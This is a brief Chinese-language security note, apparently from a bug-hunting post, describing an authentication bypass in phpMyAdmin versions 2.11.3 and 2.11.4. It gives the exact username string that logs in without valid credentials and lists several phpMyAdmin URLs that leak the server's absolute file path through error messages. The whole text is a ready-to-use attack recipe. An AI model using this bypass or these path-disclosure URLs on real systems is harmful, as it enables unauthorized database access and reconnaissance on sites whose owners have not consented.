影响版本:2.11.3 / 2.11.4 大约2012年左右的网站 貌似不多了 刷教育SRC 碰到一个
利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
附上几个php爆绝对路径的办法:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php